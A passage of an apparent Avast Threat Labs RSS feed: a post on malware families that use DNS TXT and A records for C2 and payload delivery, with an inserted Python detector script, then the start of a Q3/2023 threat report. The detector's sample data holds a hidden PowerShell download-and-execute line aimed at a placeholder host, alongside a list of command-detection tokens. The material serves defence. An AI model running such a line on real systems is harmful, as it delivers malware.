  4826. <h2 class="wp-block-heading">Threats in the wild</h2>
  4827.  
  4828.  
  4829.  
  4830. <p>The number of malware families leveraging DNS to carry out malicious activity is increasing. At Avast, we keep up with the current trends and, with our DNS scanning feature, we provide robust protection even against these kinds of attacks.</p>
  4831.  
  4832.  
  4833.  
  4834. <p>Let’s peek under the hood of a couple of advanced malware families that leverage DNS for distributing additional payloads and obfuscating the communication with Command &amp; Control (C2) servers.</p>
  4835.  
  4836.  
  4837.  
  4838. <h3 class="wp-block-heading">ViperSoftX</h3>
  4839.  
  4840.  
  4841.  
  4842. <p><a href="https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/" target="_blank" rel="noreferrer noopener">ViperSoftX</a> is a long-standing information stealer. Reaching back at least to 2020, it is mostly bundled with software from unofficial sources and cracks, commonly distributed over torrents. Its wide capabilities, which are to this day intensively developed and improved, go from stealing cryptocurrencies, clipboard swapping, fingerprinting the infected device, downloading and executing additional payloads, to further deploying a malicious browser extension called <a href="https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/" target="_blank" rel="noreferrer noopener">VenomSoftX</a>.&nbsp;</p>
  4843.  
  4844.  
  4845.  
  4846. <p>One of the features the malware authors also implemented is querying DNS to retrieve a <code>TXT</code> record from a registered C2 domain. This <code>TXT</code> record contains an execution command that downloads further malware stages. We can demonstrate this behavior ourselves by using nslookup on the malicious domain.</p>
  4847.  
  4848.  
  4849. <div class="wp-block-image">
  4850. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image.png"><img loading="lazy" decoding="async" width="850" height="240" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image.png" alt="" class="wp-image-7893" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-300x85.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-768x217.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>DNS TXT record containing a PowerShell command</em></figcaption></figure></div>
  4851.  
  4852.  
4853. <p>This command, returned in the form of a DNS <code>TXT</code> response, downloads an additional payload from <code>microsoft-analyse[.]com</code>. The file <code>last.txt</code> contains an obfuscated PowerShell script that carries a further malware stage when executed.</p>
  4854.  
  4855.  
  4856. <div class="wp-block-image">
  4857. <figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1.png"><img loading="lazy" decoding="async" width="1024" height="326" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1-1024x326.png" alt="" class="wp-image-7894" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1-1024x326.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1-300x96.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1-768x245.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-1.png 1227w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Payload script downloaded from the DNS TXT response script</em></figcaption></figure></div>
  4858.  
  4859.  
  4860. <h3 class="wp-block-heading">DarkGate</h3>
  4861.  
  4862.  
  4863.  
  4864. <p>Also known as <a href="https://decoded.avast.io/janrubin/complex-obfuscation-meh/" target="_blank" rel="noreferrer noopener">MehCrypter</a> and <a href="https://decoded.avast.io/janrubin/meh-2-2/" target="_blank" rel="noreferrer noopener">Meh</a>, DarkGate is another advanced information stealer. This stealer, these days weaponized as malware-as-a-service (MaaS), continues to add new features to its operations.&nbsp;</p>
  4865.  
  4866.  
  4867.  
  4868. <p>Alongside features like keylogging, stealing clipboard contents as well as cryptocurrency wallets, and RAT capabilities, DarkGate can also make DNS requests to query DNS <code>TXT</code> responses.&nbsp;</p>
  4869.  
  4870.  
  4871.  
4872. <p>Currently, one of the distribution methods starts as phishing (e.g., in the form of a PDF), with the document claiming it cannot be loaded properly and that the user needs to click an “Open this document” button. This action downloads a ZIP archive containing an LNK file with a PDF (Adobe Reader) icon. However, after the LNK file is opened, the malware instead executes a command that makes a DNS request and reads the <code>TXT</code> field from the response.</p>
  4873.  
  4874.  
  4875. <div class="wp-block-image">
  4876. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2.png"><img loading="lazy" decoding="async" width="850" height="120" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2.png" alt="" class="wp-image-7895" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2-300x42.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-2-768x108.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>Command executed from a LNK file, performing a DNS query</em></figcaption></figure></div>
  4877.  
  4878.  
  4879. <p>After the <code>Taste.cmd</code> script is downloaded and executed, a further series of commands is executed, deploying the DarkGate information stealer on the infected machine.</p>
  4880.  
  4881.  
  4882. <div class="wp-block-image">
  4883. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3.png"><img loading="lazy" decoding="async" width="850" height="312" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3.png" alt="" class="wp-image-7896" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3-300x110.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-3-768x282.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>Taste.cmd script (beautified), an intermediary that ensures the execution of DarkGate</em></figcaption></figure></div>
  4884.  
  4885.  
  4886. <h3 class="wp-block-heading">DirtyMoe</h3>
  4887.  
  4888.  
  4889.  
4890. <p>Since 2016, the notorious <a href="https://decoded.avast.io/martinchlumecky/dirtymoe-1/" target="_blank" rel="noreferrer noopener">DirtyMoe</a> malware has been infecting victims all over the world, focusing most heavily on Asia and Africa. This multi-modular backdoor is equipped with a variety of functionalities, ranging from exploiting network protocols, cryptojacking, and performing DDoS attacks to leveraging rootkit capabilities, and much more.</p>
  4891.  
  4892.  
  4893.  
4894. <p>This is further underlined by DirtyMoe’s sophisticated network communication. The malware makes DNS queries using a predefined list of DNS servers and retrieves a list of IP addresses for a single domain from the A record fields. However, these IP addresses, even though syntactically valid, are artificial: they either do not exist or do not point to the addresses the malware actually wants. The real IP addresses are instead derived from these A records by an additional algorithm. Each of the derived IP addresses is then tried, one of them being the real C2 server.</p>
  4895.  
  4896.  
  4897.  
4898. <p>Finally, the list of A records also changes rapidly and regularly. This DNS fast-fluxing technique further hides the real C2 servers among the fake addresses, making the whole malware communication even more opaque for defenders.</p>
  4899.  
  4900.  
  4901.  
  4902. <p>In the example below, the malicious server <code>rpc[.]1qw[.]us</code> provides a list of IP addresses (<code>A</code> records). However, these IP addresses are artificial, and they are used for further derivation of the real IP addresses.</p>
  4903.  
  4904.  
  4905. <div class="wp-block-image">
  4906. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-4.png"><img loading="lazy" decoding="async" width="632" height="461" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-4.png" alt="" class="wp-image-7897" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-4.png 632w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-4-300x219.png 300w" sizes="(max-width: 632px) 100vw, 632px" /></a><figcaption class="wp-element-caption"><em>DNS records are changed rapidly and regularly</em></figcaption></figure></div>
  4907.  
  4908.  
  4909. <h3 class="wp-block-heading">Crackonosh</h3>
  4910.  
  4911.  
  4912.  
  4913. <p>Similar to ViperSoftX, <a href="https://decoded.avast.io/danielbenes/crackonosh-a-new-malware-distributed-in-cracked-software/" target="_blank" rel="noreferrer noopener">Crackonosh</a> is distributed along with illegal, cracked copies of popular software. If the unsuspecting victim installs such cracked software, they inadvertently deploy an XMRig coinminer onto their system, leveraging its resources to profit the attackers.&nbsp;</p>
  4914.  
  4915.  
  4916.  
4917. <p>Crackonosh employs many advanced techniques, such as disabling antivirus software and Windows Update, as well as other anti-detection and anti-forensic measures.</p>
  4918.  
  4919.  
  4920.  
  4921. <p>Additionally, Crackonosh also queries the DNS database as part of its update mechanism. To do so, Crackonosh reads a <code>TXT</code> record from the registered server’s response which contains a string like <code>ajdbficadbbfC@@@FEpHw7Hn33</code>. This string is then parsed and both an IP address as well as a port are derived from it. With this information, Crackonosh downloads a file <code>wksprtcli.dll</code>, containing the malware’s update routine.</p>
  4922.  
  4923.  
  4924. <div class="wp-block-image">
  4925. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5.png"><img loading="lazy" decoding="async" width="773" height="81" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5.png" alt="" class="wp-image-7898" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5.png 773w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5-300x31.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/12/image-5-768x80.png 768w" sizes="(max-width: 773px) 100vw, 773px" /></a><figcaption class="wp-element-caption"><em>Crackonosh decrypting the IP address from a string received in the TXT record</em></figcaption></figure></div>
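<p>As an added example (not code from the original post or from Avast's products), the following Python triages a batch of observed DNS answers for the two defender-relevant behaviours described in this section: <code>TXT</code> records that carry a command or an opaque payload (ViperSoftX, DarkGate, Crackonosh) and <code>A</code> record sets that rotate rapidly (DirtyMoe fast flux). All names, addresses, thresholds and the token lists are constructed for illustration; only the Crackonosh-style string is taken from the text above.</p>

```python
"""Heuristic triage of DNS answers for two C2 patterns: TXT records carrying a
command or an opaque payload, and A records that rotate rapidly (fast flux).
All sample answers below are constructed; they are not real telemetry."""
import math
import re
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsAnswer:
    ts: int       # observation time, epoch seconds
    qname: str
    rtype: str    # "TXT" or "A"
    rdata: str    # TXT payload, or a single IPv4 address for an A record


# Common benign TXT conventions: long and entropy-rich, but not a C2 channel.
BENIGN_TXT_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1", "google-site-verification=", "ms=")
# Tokens that mark a TXT payload as a command rather than data (matched lowercase).
COMMAND_TOKENS = ("powershell", "cmd.exe", "iex ", "invoke-expression", "downloadstring",
                  "mshta", "certutil", "bitsadmin", "rundll32", "http://", "https://")
# A TXT answer consisting of one unbroken run from a base64-like alphabet.
OPAQUE_BLOB = re.compile(r"^[A-Za-z0-9+/=@_\-]{20,}$")


def shannon_entropy(s):
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def txt_indicators(rdata):
    """Return the reasons a TXT payload looks like C2 traffic (empty list if none)."""
    low = rdata.lower()
    if low.startswith(BENIGN_TXT_PREFIXES):
        return []
    reasons = []
    hits = [t for t in COMMAND_TOKENS if t in low]
    if hits:
        reasons.append("command-like tokens: " + ", ".join(t.strip() for t in hits))
    if OPAQUE_BLOB.match(rdata) and shannon_entropy(rdata) >= 3.5:
        reasons.append(f"opaque blob, entropy {shannon_entropy(rdata):.2f} bits/char")
    return reasons


def fast_flux_report(answers, min_distinct_ips=8, min_rotations=2, max_window=3600):
    """Per name, count distinct A-record IPs and how often the answer set changed
    between consecutive lookups. Names whose set turns over quickly inside the
    window are reported as {qname: (distinct_ips, rotations, span_seconds)}."""
    by_name = defaultdict(lambda: defaultdict(set))   # qname -> ts -> IPs in that answer
    for a in answers:
        if a.rtype == "A":
            by_name[a.qname][a.ts].add(a.rdata)
    report = {}
    for qname, per_ts in by_name.items():
        times = sorted(per_ts)
        distinct = set().union(*per_ts.values())
        rotations = sum(1 for p, c in zip(times, times[1:]) if per_ts[p] != per_ts[c])
        span = times[-1] - times[0]
        if len(distinct) >= min_distinct_ips and rotations >= min_rotations and span <= max_window:
            report[qname] = (len(distinct), rotations, span)
    return report


def triage(answers):
    """Combine both checks over a batch of observed answers."""
    txt = [(a.qname, txt_indicators(a.rdata)) for a in answers if a.rtype == "TXT"]
    return {"txt": [(q, r) for q, r in txt if r], "fast_flux": fast_flux_report(answers)}


def _constructed_answers():
    """Constructed sample: RFC 2606 names and TEST-NET addresses only."""
    out = [
        # Command delivered in a TXT record, as with ViperSoftX/DarkGate (URL is a placeholder).
        DnsAnswer(1700000000, "c2.example", "TXT",
                  "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                  ".DownloadString('http://dl.example/last.txt')\""),
        # Ordinary mail-authentication records, which the benign-prefix list excludes.
        DnsAnswer(1700000001, "mail.example", "TXT", "v=spf1 include:_spf.example ~all"),
        DnsAnswer(1700000002, "s1._domainkey.example", "TXT",
                  "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB"),
        # Opaque update string of the kind Crackonosh parses for an IP address and port.
        DnsAnswer(1700000003, "upd.example", "TXT", "ajdbficadbbfC@@@FEpHw7Hn33"),
    ]
    # Three lookups five minutes apart: flux.example answers with four never-repeated
    # addresses each time, while static.example always answers with the same two.
    for i, ts in enumerate((1700000000, 1700000300, 1700000600)):
        out += [DnsAnswer(ts, "flux.example", "A", f"203.0.113.{i * 4 + j + 1}") for j in range(4)]
        out += [DnsAnswer(ts, "static.example", "A", ip) for ip in ("192.0.2.10", "192.0.2.11")]
    return out


if __name__ == "__main__":
    result = triage(_constructed_answers())
    for qname, reasons in result["txt"]:
        print(f"TXT  {qname}: {'; '.join(reasons)}")
    for qname, (ips, rot, span) in result["fast_flux"].items():
        print(f"FLUX {qname}: {ips} IPs, {rot} rotations in {span}s")
```

<p>The benign-prefix list and the entropy threshold are the parts a real deployment tunes: a verification or DKIM record scores high on entropy but is excluded by prefix, whereas a CDN name that rotates among a handful of addresses stays below the distinct-IP threshold.</p>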
  4926.  
  4927.  
  4928. <h2 class="wp-block-heading">DNS protection in Avast</h2>
  4929.  
  4930.  
  4931.  
4932. <p>At Avast, both our free and paid versions protect users against DNS-based threats. This protection, available since version 23.8, includes:</p>
  4933.  
  4934.  
  4935.  
  4936. <ul>
  4937. <li>Support for detecting C2 callbacks, data exfiltration, and payload delivery through the TXT records&nbsp;</li>
  4938.  
  4939.  
  4940.  
  4941. <li>Support for detecting DNS C2 tunneling through the malicious NS servers&nbsp;</li>
  4942.  
  4943.  
  4944.  
  4945. <li>Scanner supports scanning of A, AAAA, PTR, NX, TXT DNS records, in both directions</li>
  4946. </ul>
  4947.  
  4948.  
  4949.  
  4950. <p>Our paid plan also contains an additional feature, called <a href="https://support.avast.com/en-us/article/antivirus-real-site-faq" target="_blank" rel="noreferrer noopener">Real Site</a>, which provides an encrypted connection between your web browser and Avast&#8217;s own DNS server to prevent hijacking. In other words, Real Site ensures that the displayed website is the authentic one.</p>
  4951.  
  4952.  
  4953.  
  4954. <h2 class="wp-block-heading">Conclusion</h2>
  4955.  
  4956.  
  4957.  
  4958. <p>Understanding DNS threats is crucial for defenders. We described how threat actors can leverage DNS to carry out specific attacks. We also provided examples of advanced malware families that use such techniques, distributing additional malware payloads, obfuscating the communication, tunneling their C2 commands through the network, and more. With Avast’s DNS scanning capabilities, we protect our users against these types of threats.&nbsp;</p>
  4959. <p>The post <a href="https://decoded.avast.io/threatintel/opening-a-new-front-against-dns-based-threats/">Opening a new front against DNS-based threats</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  4960. ]]></content:encoded>
  4961. </item>
  4962. <item>
  4963. <title>Avast Q3/2023 Threat Report</title>
  4964. <link>https://decoded.avast.io/threatresearch/avast-q3-2023-threat-report/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=avast-q3-2023-threat-report</link>
  4965. <dc:creator><![CDATA[Threat Research Team]]></dc:creator>
  4966. <pubDate>Thu, 16 Nov 2023 08:00:00 +0000</pubDate>
  4967. <category><![CDATA[Mobile]]></category>
  4968. <category><![CDATA[PC]]></category>
  4969. <category><![CDATA[Reports]]></category>
  4970. <category><![CDATA[desktop]]></category>
  4971. <category><![CDATA[malware]]></category>
  4972. <category><![CDATA[mobile]]></category>
  4973. <category><![CDATA[report]]></category>
  4974. <category><![CDATA[risk]]></category>
  4975. <category><![CDATA[threats]]></category>
  4976. <guid isPermaLink="false">https://decoded.avast.io/?p=7774</guid>
  4977.  
  4978. <description><![CDATA[<p>Stunning 50% Surge in Blocked Attacks, Resulting in 1 Billion Monthly Blocks</p>
  4979. <p>The post <a href="https://decoded.avast.io/threatresearch/avast-q3-2023-threat-report/">Avast Q3/2023 Threat Report</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  4980. ]]></description>
  4981. <content:encoded><![CDATA[
  4982. <h3 class="wp-block-heading"><strong>Stunning 50% Surge in Blocked Attacks, Resulting in 1 Billion Monthly Blocks</strong></h3>
  4983.  
  4984.  
  4985.  
  4986. <h2 class="wp-block-heading">Foreword</h2>
  4987.  
  4988.  
  4989.  
  4990. <p>As we delve into the Q3/2023 Threat Report, it is evident that the past quarter was not an ordinary one. Typically, vacation time ushers in a decrease in online activity, offering a brief respite from cyber threats. This year, however, the digital landscape took an unexpected turn. Despite reduced online presence, our detection systems recorded a jaw-dropping 50% increase in unique blocked attacks, leading to new all-time highs. On average, <strong>we blocked over one billion unique malware attacks each month during Q3/2023</strong>. The surge was driven by a substantial rise in web-based threats, particularly social engineering, and malvertising. Consequently, the overall risk ratio, representing the risk of being targeted and protected by us, now exceeds 30%.&nbsp;</p>
  4991.  
  4992.  
  4993. <div class="wp-block-image">
  4994. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="667" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic-667x1024.png" alt="" class="wp-image-7779" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic-667x1024.png 667w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic-196x300.png 196w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic-768x1178.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Threat-Labs-infographic.png 792w" sizes="(max-width: 667px) 100vw, 667px" /></figure></div>
  4995.  
  4996.  
  4997. <p>The adoption of AI by threat actors, particularly in deepfake financial scams, is accelerating. The nefarious use of deepfakes targeting TikTok users, often featuring public figures such as Elon Musk, has emerged as a growing concern. More on this can be found in our Featured story section.&nbsp;</p>
  4998.  
  4999.  
  5000.  
  5001. <p>Furthermore, the threat landscape was marked by a doubling of the adware threat level, indicating a significant escalation in adware. South America, Africa, Southeast Europe, and East Asia bore the brunt of this surge.&nbsp;</p>
  5002.  
  5003.  
  5004.  
  5005. <p>Apart from adware, there were significant developments in the realm of botnets. The FBI&#8217;s attempt to dismantle the Qakbot botnet led to a noticeable drop in activity. However, the operation does not appear to be entirely extinguished, as some associated threat actors have already begun to shift to alternative strains, such as DarkGate.&nbsp;</p>
  5006.  
  5007.  
  5008.  
  5009. <p>In addition, information stealers recorded a substantial increase in risk ratio, with Ukraine (44%), the United States (21%), and India (16%) experiencing the most significant spikes. AgentTesla dominated this landscape, while the once-notorious Raccoon Stealer seems to be losing its momentum and receding from the forefront.&nbsp;</p>
  5010.  
  5011.  
  5012.  
5013. <p>Remote Access Trojans (RATs) also continue to be a growing trend. The increase in RATs, first observed in Q2/2023, continued in Q3/2023, driven primarily by the Remcos RAT and Warzone. Countries such as Portugal (148% increase), Poland (55%), and Slovakia (43%) have experienced a significant rise in attacks. The XWorm strain remains prolific, consistently releasing new versions and expanding its reach.</p>
  5014.  
  5015.  
  5016.  
  5017. <p>Furthermore, the emergence of a new vulnerability, CVE-2023-38831, in the popular WinRAR software caught the attention of threat actors, including APTs, RATs, and malware downloaders. Given the software&#8217;s widespread use, these exploits are likely to persist, emphasizing the importance of keeping software updated. For more on these vulnerabilities, delve into our Exploits section.&nbsp;</p>
  5018.  
  5019.  
  5020.  
  5021. <p>The domain of scams has undergone significant changes, with dating scams witnessing a 34% increase quarter-on-quarter. Belgium, Germany, Canada, and the United States are among the top targets for these scammers. To compound the challenge, our researchers uncovered a new threat, which we have named Love-GPT. This AI-driven tool assists threat actors in creating realistic personas, amplifying the success of their fraudulent activities.&nbsp;</p>
  5022.  
  5023.  
  5024.  
  5025. <p>Phishing attacks have also experienced a 14% quarterly increase, with threat actors innovatively utilizing IPFS (InterPlanetary File System) to bypass conventional defense mechanisms. Australia, in particular, saw a substantial surge in targeted email scams.&nbsp;</p>
  5026.  
  5027.  
  5028.  
  5029. <p>Finally, the mobile threat landscape remains dynamic, marked by espionage tactics. Spyware mimicking a missile warning application used in Israel emerged in response to escalating tensions between Israel and Palestine, with the aim of stealing victim data. Also, the introduction of Invisible Adware, with over two million downloads from the Google PlayStore, contributed to the rising risk of mobile adware. Brazil, India, and Argentina remain the top-affected countries. Also, the gap left by the takedown of FluBot in mobile banking trojans is gradually being filled. This quarter saw the detection of new and resurrected bankers, including Xenomorph, GoldDigger, and SpyNote. Turkey, Spain, and France continue to be the prime targets for attackers in this category. Popular messenger application mods, such as Telegram, Signal, and WhatsApp, continue to be exploited to serve spyware. Additionally, SpyLoans continues to spread on PlayStore, posing extortion threats to vulnerable victims.&nbsp;</p>
  5030.  
  5031.  
  5032.  
  5033. <p>In conclusion, Q3/2023 has unveiled an unprecedented level of cyber threats. The surge in threat activity during a season that typically sees reduced online presence is a cause for concern. As we move into the winter season, traditionally marked by higher threat levels, we are watchful to see if this trend continues to escalate.&nbsp;</p>
  5034.  
  5035.  
  5036.  
  5037. <p>Thank you for your continued trust in Avast. Stay safe and secure.</p>
  5038.  
  5039.  
  5040.  
  5041. <p class="has-text-align-right"><em>Jakub Křoustek, Malware Research Director</em></p>
  5042.  
  5043.  
  5044.  
  5045. <h2 class="wp-block-heading">Methodology</h2>
  5046.  
  5047.  
  5048.  
  5049. <p>This report is structured into two main sections: <em>Desktop-related threats</em>, where we describe our intelligence around attacks targeting the Windows, Linux, and Mac operating systems, with a specific emphasis on web-related threats, and <em>Mobile-related threats</em>, where we describe the attacks focusing on Android and iOS operating systems.&nbsp;</p>
  5050.  
  5051.  
  5052.  
  5053. <p>We use the term “<em>risk ratio”</em> in this report to denote the severity of specific threats. It is calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.&nbsp;</p>
  5054.  
  5055.  
  5056.  
  5057. <p>A blocked attack is defined as a unique combination of the protected user and a blocked threat identifier within the specified period.&nbsp;</p>
  5058.  
  5059.  
  5060.  
  5061. <p>In this Threat Report, we started with a more fine-grained labelling of various Scam threat types, which resulted in a separate tracking of e.g., malvertising compared to the previous reports. Furthermore, we have included some more threat data sources to provide even better threat landscape visibility.&nbsp;</p>
  5062.  
  5063.  
  5064.  
  5065. <h2 class="wp-block-heading">Featured Story: TikTok Finance Scams: An Escalating Threat Fueled by Artificial Intelligence</h2>
  5066.  
  5067.  
  5068.  
  5069. <p>TikTok, known for its virality and rapidly circulating digital trends, has emerged as a fertile ground for financial scams, specifically those involving cryptocurrency. The platform&#8217;s wide reach, coupled with its appeal to younger audiences, presents an attractive prospect for malicious actors aiming to exploit unsuspecting users.&nbsp;</p>
  5070.  
  5071.  
  5072.  
  5073. <p>The scams operate under a facade of legitimacy, often initiated with a deepfake video of a reputable figure endorsing a cryptocurrency exchange. Users are enticed to sign up on the purported exchange using a promo code, which allegedly credits their account with a significant amount of bitcoin. However, upon attempting to withdraw these funds, the platform mandates a preliminary transfer of bitcoin to &#8220;verify&#8221; the user&#8217;s account. Unwittingly, victims who comply with this requirement find that not only is the promised bitcoin unattainable, but also any transferred funds to the platform are irretrievably lost to the cybercriminals orchestrating the scam.&nbsp;</p>
  5074.  
  5075.  
  5076.  
  5077. <p>At the heart of these scams is the illicit utilization of Artificial Intelligence (AI) to create deepfake videos. Notorious personalities such as Elon Musk, Mr. Beast, Sam Altman, Warren Buffet, Joe Rogan, Donald Trump, and Tucker Carlson are impersonated in fraudulent endorsements of cryptocurrency exchanges. These fabricated endorsements lure users with promises of substantial Bitcoin rewards, setting the stage for financial deception.</p>
  5078.  
  5079.  
  5080.  
  5081. <div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container">
  5082. <div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-2 wp-block-columns-is-layout-flex">
  5083. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  5084. <figure class="wp-block-video"><video controls src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Trump.mp4"></video></figure>
  5085. </div>
  5086.  
  5087.  
  5088.  
  5089. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  5090. <figure class="wp-block-video"><video controls src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Musk.mp4"></video></figure>
  5091. </div>
  5092. </div>
  5093.  
  5094.  
  5095.  
  5096. <p class="has-text-align-center has-small-font-size"><em>Samples of videos circulating on TikTok impersonating Elon Musk and Donald Trump</em></p>
  5097. </div></div>
  5098.  
  5099.  
  5100.  
  5101. <p><a href="https://decoded.avast.io/threatintel/insights-into-the-ai-based-cyber-threat-landscape/" target="_blank" rel="noreferrer noopener">The malicious use of AI</a>, particularly deepfake technology, underscores the escalating sophistication of cyber adversaries. By creating convincing counterfeit videos of reputable individuals, scammers successfully manipulate public trust. This exploitation not only exhibits a concerning trend of cyber threats on social media platforms but also exemplifies the potential of AI in augmenting the effectiveness of financial scams. Deepfake technology, once the domain of high-skilled individuals, is becoming increasingly accessible, making it all the more difficult to discern real endorsements from fabricated ones.&nbsp;</p>
  5102.  
  5103.  
  5104.  
  5105. <p>Initially confined to English-speaking audiences, these scams have transcended linguistic barriers, making inroads into non-English speaking regions. Recent manifestations of these scams have been observed in various languages including Spanish, German, Italian and French, reflecting a broadening threat landscape. The multilingual expansion of these scams signifies a global threat and underscores the necessity for multinational cooperation in tackling these AI-driven scams.&nbsp;</p>
  5106.  
  5107.  
  5108.  
  5109. <div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container">
  5110. <div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-3 wp-block-columns-is-layout-flex">
  5111. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  5112. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="461" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-461x1024.jpeg" alt="" class="wp-image-7789" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-461x1024.jpeg 461w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-135x300.jpeg 135w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-768x1708.jpeg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian-691x1536.jpeg 691w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Italian.jpeg 921w" sizes="(max-width: 461px) 100vw, 461px" /></figure>
  5113. </div>
  5114.  
  5115.  
  5116.  
  5117. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  5118. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="461" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-461x1024.jpeg" alt="" class="wp-image-7790" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-461x1024.jpeg 461w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-135x300.jpeg 135w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-768x1708.jpeg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French-691x1536.jpeg 691w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/French.jpeg 921w" sizes="(max-width: 461px) 100vw, 461px" /></figure>
  5119. </div>
  5120. </div>
  5121.  
  5122.  
  5123.  
  5124. <p class="has-text-align-center has-small-font-size"><em>Screenshots of scam videos in Italian and French circulating on TikTok</em>&nbsp;</p>
  5125. </div></div>
  5126.  
  5127.  
  5128.  
5129. <p>Though TikTok is the primary stage for these scams, evidence suggests a multi-platform approach by malicious actors. Platforms like YouTube have also been utilized to disseminate scam content, indicating a broader digital footprint and an extended reach of these deceptive practices. TikTok alone has more than 1 billion monthly active users, which makes the attack surface huge. When we started blocking access to these scam websites, we protected several thousand users in a matter of a few days.</p>
  5130.  
  5131.  
  5132.  
  5133. <p>The TikTok scams are not isolated incidents but rather indicators of a growing trend of AI-driven cyber threats. The ease of spreading misinformation through deepfake technology, coupled with the allure of quick financial gains, is a potent combination that may pave the way for more sophisticated scams in the future. The potential ramifications extend beyond individual economic loss to a broader erosion of trust in digital platforms and notable personalities.</p>
  5134.  
  5135.  
  5136.  
  5137. <p class="has-text-align-right"><em>Luis Corrons, Security Evangelist</em></p>
  5138.  
  5139.  
  5140.  
  5141. <h2 class="wp-block-heading">Desktop-Related Threats&nbsp;</h2>
  5142.  
  5143.  
  5144.  
  5145. <h3 class="wp-block-heading">Advanced Persistent Threats (APTs)</h3>
  5146.  
  5147.  
  5148.  
